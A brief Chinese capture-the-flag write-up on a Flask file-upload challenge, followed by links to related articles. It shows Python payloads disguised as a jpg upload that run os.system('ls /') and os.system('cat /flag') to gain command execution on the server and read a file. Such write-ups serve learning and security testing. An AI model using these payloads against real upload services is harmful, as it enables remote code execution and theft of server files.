Flask_FileUpload
16lz
2021-03-18
一、题目:
二、查看网页源码:
获取上传文件仅:jpg、png,且说明上传python
三、使用vim创建包含python代码的jpg文件
import os
os.system('ls /')
上传成功,存在远程执行漏洞
查看flag
import os
os.system('cat /flag')
更多相关文章
- mysql数据库题目
- tp6 多文件上传
- 上传自己的镜像被拒绝denied: requested access to the resource
- pod一直处于ContainerCreating状态,
- 社区版本idea查看继承关系的骚操作
- docker安装
- webuploader文件上传到哪里的问题
- 解决 Jenkins Artifactory Plugin 在 AIX 上传制品失败的问题
- MongoDB Server对于Sort排序能够支持的最大内存限制查看